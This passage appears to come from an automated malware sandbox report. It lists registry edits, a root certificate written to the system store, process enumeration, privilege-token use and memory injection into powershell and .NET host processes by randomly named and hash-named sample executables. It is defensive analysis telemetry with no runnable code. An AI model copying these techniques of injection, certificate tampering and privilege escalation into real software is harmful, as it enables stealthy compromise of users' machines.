Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-542 = "Myanmar Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-91 = "Pacific SA Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-871 = "Pakistan Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-792 = "SA Western Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-271 = "Greenwich Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2342 = "Haiti Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-371 = "Jerusalem Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time" C:\Windows\windefender.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\SkWMGGpeI3TJBXP1ZRAyaf4U.exe N/A
N/A N/A C:\Users\Admin\Pictures\SkWMGGpeI3TJBXP1ZRAyaf4U.exe N/A
N/A N/A C:\Users\Admin\Pictures\SkWMGGpeI3TJBXP1ZRAyaf4U.exe N/A
N/A N/A C:\Users\Admin\Pictures\SkWMGGpeI3TJBXP1ZRAyaf4U.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2sg.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2sg.0.exe N/A
N/A N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
N/A N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
N/A N/A C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
N/A N/A C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe N/A
N/A N/A C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
N/A N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
N/A N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
N/A N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
N/A N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
N/A N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
N/A N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
N/A N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
N/A N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
N/A N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
N/A N/A C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
N/A N/A C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe N/A
N/A N/A C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe N/A
N/A N/A C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3192 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3192 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3192 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 3192 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 3192 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 3192 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
